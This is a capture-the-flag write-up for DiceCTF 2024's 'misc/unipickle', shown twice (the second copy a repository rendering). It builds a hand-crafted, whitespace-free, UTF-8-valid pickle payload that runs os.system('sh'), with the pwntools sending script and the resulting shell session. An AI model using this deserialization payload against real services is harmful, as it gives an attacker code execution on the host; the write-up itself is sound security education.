u.twoha.cc/ctf/dicectf/misc_unipickle.md

---
date: '2024-02-06'
tags: ['ctf', 'ctf-misc', 'python']
title: 'DiceCTF 2024 Quals: misc/unipickle'
---
## Task
> **misc/unipickle**
>
> pickle
>
> `nc mc.ax 31773`
>
> [`unipickle.py`](https://static.dicega.ng/uploads/96309f792c0265d8f89a886cbf610816bedf88184e5ec4302ae46f6f7413de7e/unipickle.py)

- `Author: kmh`
- `Points: 144`
- `Solves: 68 / 1040 (6.538%)`

## Writeup

The challenge consists of a very short python file that just unpickles our input and exits:

```py
#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())
```

Looking at Python's documentation for the `pickle` module, we can see the following:

> Warning: The `pickle` module is not secure. Only unpickle data you trust.
> It is possible to construct malicious pickle data which will **execute arbitrary code during unpickling**. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.

A quick search shows us that we can pickle code to get a shell as follows:

```py
import pickle
import os

class A:
    def __reduce__(self):
        return (os.system, ('sh',))

payload = pickle.dumps(A())
print(payload)
# b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02sh\x94\x85\x94R\x94.'
```

Now we just need to send this to the program:

```py
from pwn import remote

r = remote('mc.ax', 31773)
r.sendline(payload)
r.interactive()
```

However, when we run this, we get the following error:

```
pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
UnicodeEncodeError: 'utf-8' codec can't encode character '\udc80' in position 0: surrogates not allowed
```

It appears that our pickle code will need to be a valid UTF-8 string.

The pickle format has gone through multiple iterations, called protocols. Protocol 0 was the first pickle format, and was designed to consist of entirely ASCII characters.

Let's try dumping our code again, this time using protocol 0:

```py
payload = pickle.dumps(A(), protocol=0)
print(payload)
# b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'
```

Now we get a different error:

```
pickle: Traceback (most recent call last):
  File "/app/run", line 3, in <module>
    pickle.loads(input("pickle: ").split()[0].encode())
_pickle.UnpicklingError: pickle data was truncated
```

A closer look at the code reveals that our input is split and truncated on whitespace before being unpickled, meaning that we cannot use any spaces or newlines in our pickle code.

We can try using every protocol available (up to protocol 5), but none of them run without error. Since we cannot produce pickle code that will pass this challenge using `pickle.dumps`, we will have to write the pickle code by hand.

The `pickletools` module contains a considerable amount of documentation on the pickle format, including a brief overview on pickling:

> "A pickle" is a program for a virtual pickle machine (PM, but more accurately
> called an unpickling machine).  It's a sequence of opcodes, interpreted by the
> PM, building an arbitrarily complex Python object.
>
> For the most part, the PM is very simple:  there are no looping, testing, or
> conditional instructions, no arithmetic and no function calls.  Opcodes are
> executed once each, from first to last, until a STOP opcode is reached.
>
> The PM has two data areas, "the stack" and "the memo".
>
> Many opcodes push Python objects onto the stack; e.g., INT pushes a Python
> integer object on the stack, whose value is gotten from a decimal string
> literal immediately following the INT opcode in the pickle bytestream.  Other
> opcodes take Python objects off the stack.  The result of unpickling is
> whatever object is left on the stack when the final STOP opcode is executed.
>
> The memo is simply an array of objects, or it can be implemented as a dict
> mapping little integers to objects.  The memo serves as the PM's "long term
> memory", and the little integers indexing the memo are akin to variable
> names.  Some opcodes pop a stack object into the memo at a given index,
> and others push a memo object at a given index onto the stack again.

`pickletools` also lets us disassemble pickle code, so let's see how our previous payload works:

```py
>>> pickletools.dis(payload)
    0: c    GLOBAL     'posix system'
   14: p    PUT        0
   17: (    MARK
   18: V        UNICODE    'sh'
   22: p        PUT        1
   25: t        TUPLE      (MARK at 17)
   26: p    PUT        2
   29: R    REDUCE
   30: p    PUT        3
   33: .    STOP
highest protocol among opcodes = 0
```

The important instructions to look at are:
```py
# push the global posix.system onto the pickle stack (which is the same as os.system here)
    0: c    GLOBAL     'posix system'
# push a mark onto the pickle stack
   17: (    MARK
# push the string 'sh' onto the pickle stack
   18: V        UNICODE    'sh'
# pop until the mark and create a tuple of popped items
   25: t        TUPLE      (MARK at 17)
# call stack[-2](*stack[-1]) => posix.system('sh')
   29: R    REDUCE
```

The `GLOBAL` (`'c'`) instruction requires two string arguments ending in newlines, so we cannot use this instruction. The only other instruction to load a global is `STACK_GLOBAL` (`'\x93'`), which pops two strings off the stack for arguments.

We also cannot use the `UNICODE` (`'V'`) instruction since it takes a single string argument ending in a newline. Instead, we can use the `BINUNICODE` (`'X'`) instruction, which is followed by a little-endian `uint32` and a UTF-8 encoded string with length equal to the first argument.

Now our pickle code without any whitespace is as follows:

```py
# push 'os' to the stack
payload = b'X\x02\x00\x00\x00os'
# push 'system' to the stack
payload += b'X\x06\x00\x00\x00system'
# pop 'os' and 'system', push os.system
payload += b'\x93'
# push a mark
payload += b'('
# push 'sh'
payload += b'X\x02\x00\x00\x00sh'
# pop mark and 'sh', push ('sh',)
payload += b't'
# pop os.system, ('sh',), call os.system('sh')
payload += b'R'

# we do not have whitespace in our payload
assert all(b not in payload for b in b' \t\n\r\x0b\x0c')
```

However, our code is still not valid UTF-8. For our code to be valid UTF-8, any byte matching `0b10xxxxxx` must come after:

1. a byte matching `0b110xxxxx`
2. a byte matching `0b1110xxxx` followed by a byte matching `0b10xxxxxx`
3. a byte matching `0b11110xxx` followed by 2 bytes matching `0b10xxxxxx`

The only part causing a problem is the `STACK_GLOBAL` instruction, since its opcode is `'\x93'`, or `0b10010011`. The rest of the bytes all have 0 in the most significant bit, so they will not cause any problems.

To fix our code, we will choose to satisfy the first option, as it is the simplest.

Now we just need to find an instruction to come before `STACK_GLOBAL` that ends with a byte matching `0b110xxxxx`. Additionally, this instruction must not push or pop anything from the stack because we need `'os'` and `'system'` to be on top when `STACK_GLOBAL` is executed.

One such instruction is the `BINPUT` (`'q'`) instruction, which is followed by a `uint8` that specifies which index of the memo to copy the top of the stack into. This is effectively a no-op in our case.

After inserting the following line right before we add `STACK_GLOBAL`, our code becomes valid UTF-8:

```py
# put 'system' into index 195 of the memo
payload += b'q\xc3'
```

Running our script now successfully gives us a shell. From here, we run the following commands to get the flag:

```console
$ ls /
app
bin
boot
dev
etc
flag.eEdyUbJSVb2TmzALwXHS.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.eEdyUbJSVb2TmzALwXHS
dice{pickle_5d9ae1b0fee}
```

## Reference

- [pickle documentation](https://docs.python.org/3/library/pickle.html)
- [pickletools.py](https://github.com/python/cpython/blob/main/Lib/pickletools.py)
- [UTF-8](https://en.wikipedia.org/wiki/UTF-8)
yeah 2024-09-13 03:24:53 -04:00			`---`
			`date: '2024-02-06'`
			`tags: ['ctf', 'ctf-misc', 'python']`
			`title: 'DiceCTF 2024 Quals: misc/unipickle'`
			`---`
			`## Task`
			`> misc/unipickle`
			`>`
			`> pickle`
			`>`
			> `nc mc.ax 31773`
			`>`
			> [`unipickle.py`](https://static.dicega.ng/uploads/96309f792c0265d8f89a886cbf610816bedf88184e5ec4302ae46f6f7413de7e/unipickle.py)

			- `Author: kmh`
			- `Points: 144`
			- `Solves: 68 / 1040 (6.538%)`

			`## Writeup`

			`The challenge consists of a very short python file that just unpickles our input and exits:`

			```py
			`#!/usr/local/bin/python`
			`import pickle`
			`pickle.loads(input("pickle: ").split()[0].encode())`
			```

			Looking at Python's documentation for the `pickle` module, we can see the following:

			> Warning: The `pickle` module is not secure. Only unpickle data you trust.
			`> It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never unpickle data that could have come from an untrusted source, or that could have been tampered with.`

			`A quick search shows us that we can pickle code to get a shell as follows:`

			```py
			`import pickle`
			`import os`

			`class A:`
			`def __reduce__(self):`
			`return (os.system, ('sh',))`

			`payload = pickle.dumps(A())`
			`print(payload)`
			`# b'\x80\x04\x95\x1d\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x02sh\x94\x85\x94R\x94.'`
			```

			`Now we just need to send this to the program:`

			```py
			`from pwn import remote`

			`r = remote('mc.ax', 31773)`
			`r.sendline(payload)`
			`r.interactive()`
			```

			`However, when we run this, we get the following error:`

			```
			`pickle: Traceback (most recent call last):`
			`File "/app/run", line 3, in <module>`
			`pickle.loads(input("pickle: ").split()[0].encode())`
			`^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^`
			`UnicodeEncodeError: 'utf-8' codec can't encode character '\udc80' in position 0: surrogates not allowed`
			```

			`It appears that our pickle code will need to be a valid UTF-8 string.`

			`The pickle format has gone through multiple iterations, called protocols. Protocol 0 was the first pickle format, and was designed to consist of entirely ASCII characters.`

			`Let's try dumping our code again, this time using protocol 0:`

			```py
			`payload = pickle.dumps(A(), protocol=0)`
			`print(payload)`
			`# b'cposix\nsystem\np0\n(Vsh\np1\ntp2\nRp3\n.'`
			```

			`Now we get a different error:`

			```
			`pickle: Traceback (most recent call last):`
			`File "/app/run", line 3, in <module>`
			`pickle.loads(input("pickle: ").split()[0].encode())`
			`_pickle.UnpicklingError: pickle data was truncated`
			```

			`A closer look at the code reveals that our input is split and truncated on whitespace before being unpickled, meaning that we cannot use any spaces or newlines in our pickle code.`

			We can try using every protocol available (up to protocol 5), but none of them run without error. Since we cannot produce pickle code that will pass this challenge using `pickle.dumps`, we will have to write the pickle code by hand.

			The `pickletools` module contains a considerable amount of documentation on the pickle format, including a brief overview on pickling:

			`> "A pickle" is a program for a virtual pickle machine (PM, but more accurately`
			`> called an unpickling machine). It's a sequence of opcodes, interpreted by the`
			`> PM, building an arbitrarily complex Python object.`
			`>`
			`> For the most part, the PM is very simple: there are no looping, testing, or`
			`> conditional instructions, no arithmetic and no function calls. Opcodes are`
			`> executed once each, from first to last, until a STOP opcode is reached.`
			`>`
			`> The PM has two data areas, "the stack" and "the memo".`
			`>`
			`> Many opcodes push Python objects onto the stack; e.g., INT pushes a Python`
			`> integer object on the stack, whose value is gotten from a decimal string`
			`> literal immediately following the INT opcode in the pickle bytestream. Other`
			`> opcodes take Python objects off the stack. The result of unpickling is`
			`> whatever object is left on the stack when the final STOP opcode is executed.`
			`>`
			`> The memo is simply an array of objects, or it can be implemented as a dict`
			`> mapping little integers to objects. The memo serves as the PM's "long term`
			`> memory", and the little integers indexing the memo are akin to variable`
			`> names. Some opcodes pop a stack object into the memo at a given index,`
			`> and others push a memo object at a given index onto the stack again.`

			`pickletools` also lets us disassemble pickle code, so let's see how our previous payload works:

			```py
			`>>> pickletools.dis(payload)`
			`0: c GLOBAL 'posix system'`
			`14: p PUT 0`
			`17: ( MARK`
			`18: V UNICODE 'sh'`
			`22: p PUT 1`
			`25: t TUPLE (MARK at 17)`
			`26: p PUT 2`
			`29: R REDUCE`
			`30: p PUT 3`
			`33: . STOP`
			`highest protocol among opcodes = 0`
			```

			`The important instructions to look at are:`
			```py
			`# push the global posix.system onto the pickle stack (which is the same as os.system here)`
			`0: c GLOBAL 'posix system'`
			`# push a mark onto the pickle stack`
			`17: ( MARK`
			`# push the string 'sh' onto the pickle stack`
			`18: V UNICODE 'sh'`
			`# pop until the mark and create a tuple of popped items`
			`25: t TUPLE (MARK at 17)`
			`# call stack[-2](*stack[-1]) => posix.system('sh')`
			`29: R REDUCE`
			```

			The `GLOBAL` (`'c'`) instruction requires two string arguments ending in newlines, so we cannot use this instruction. The only other instruction to load a global is `STACK_GLOBAL` (`'\x93'`), which pops two strings off the stack for arguments.

			We also cannot use the `UNICODE` (`'V'`) instruction since it takes a single string argument ending in a newline. Instead, we can use the `BINUNICODE` (`'X'`) instruction, which is followed by a little-endian `uint32` and a UTF-8 encoded string with length equal to the first argument.

			`Now our pickle code without any whitespace is as follows:`

			```py
			`# push 'os' to the stack`
			`payload = b'X\x02\x00\x00\x00os'`
			`# push 'system' to the stack`
			`payload += b'X\x06\x00\x00\x00system'`
			`# pop 'os' and 'system', push os.system`
			`payload += b'\x93'`
			`# push a mark`
			`payload += b'('`
			`# push 'sh'`
			`payload += b'X\x02\x00\x00\x00sh'`
			`# pop mark and 'sh', push ('sh',)`
			`payload += b't'`
			`# pop os.system, ('sh',), call os.system('sh')`
			`payload += b'R'`

			`# we do not have whitespace in our payload`
			`assert all(b not in payload for b in b' \t\n\r\x0b\x0c')`
			```

			However, our code is still not valid UTF-8. For our code to be valid UTF-8, any byte matching `0b10xxxxxx` must come after:

			1. a byte matching `0b110xxxxx`
			2. a byte matching `0b1110xxxx` followed by a byte matching `0b10xxxxxx`
			3. a byte matching `0b11110xxx` followed by 2 bytes matching `0b10xxxxxx`

			The only part causing a problem is the `STACK_GLOBAL` instruction, since its opcode is `'\x93'`, or `0b10010011`. The rest of the bytes all have 0 in the most significant bit, so they will not cause any problems.

			`To fix our code, we will choose to satisfy the first option, as it is the simplest.`

			Now we just need to find an instruction to come before `STACK_GLOBAL` that ends with a byte matching `0b110xxxxx`. Additionally, this instruction must not push or pop anything from the stack because we need `'os'` and `'system'` to be on top when `STACK_GLOBAL` is executed.

			One such instruction is the `BINPUT` (`'q'`) instruction, which is followed by a `uint8` that specifies which index of the memo to copy the top of the stack into. This is effectively a no-op in our case.

			After inserting the following line right before we add `STACK_GLOBAL`, our code becomes valid UTF-8:

			```py
			`# put 'system' into index 195 of the memo`
			`payload += b'q\xc3'`
			```

			`Running our script now successfully gives us a shell. From here, we run the following commands to get the flag:`

			```console
			`$ ls /`
			`app`
			`bin`
			`boot`
			`dev`
			`etc`
			`flag.eEdyUbJSVb2TmzALwXHS.txt`
			`home`
			`lib`
			`lib32`
			`lib64`
			`libx32`
			`media`
			`mnt`
			`opt`
			`proc`
			`root`
			`run`
			`sbin`
			`srv`
			`sys`
			`tmp`
			`usr`
			`var`
			`$ cat /flag.eEdyUbJSVb2TmzALwXHS`
			`dice{pickle_5d9ae1b0fee}`
			```

			`## Reference`

			`- [pickle documentation](https://docs.python.org/3/library/pickle.html)`
			`- [pickletools.py](https://github.com/python/cpython/blob/main/Lib/pickletools.py)`
			`- [UTF-8](https://en.wikipedia.org/wiki/UTF-8)`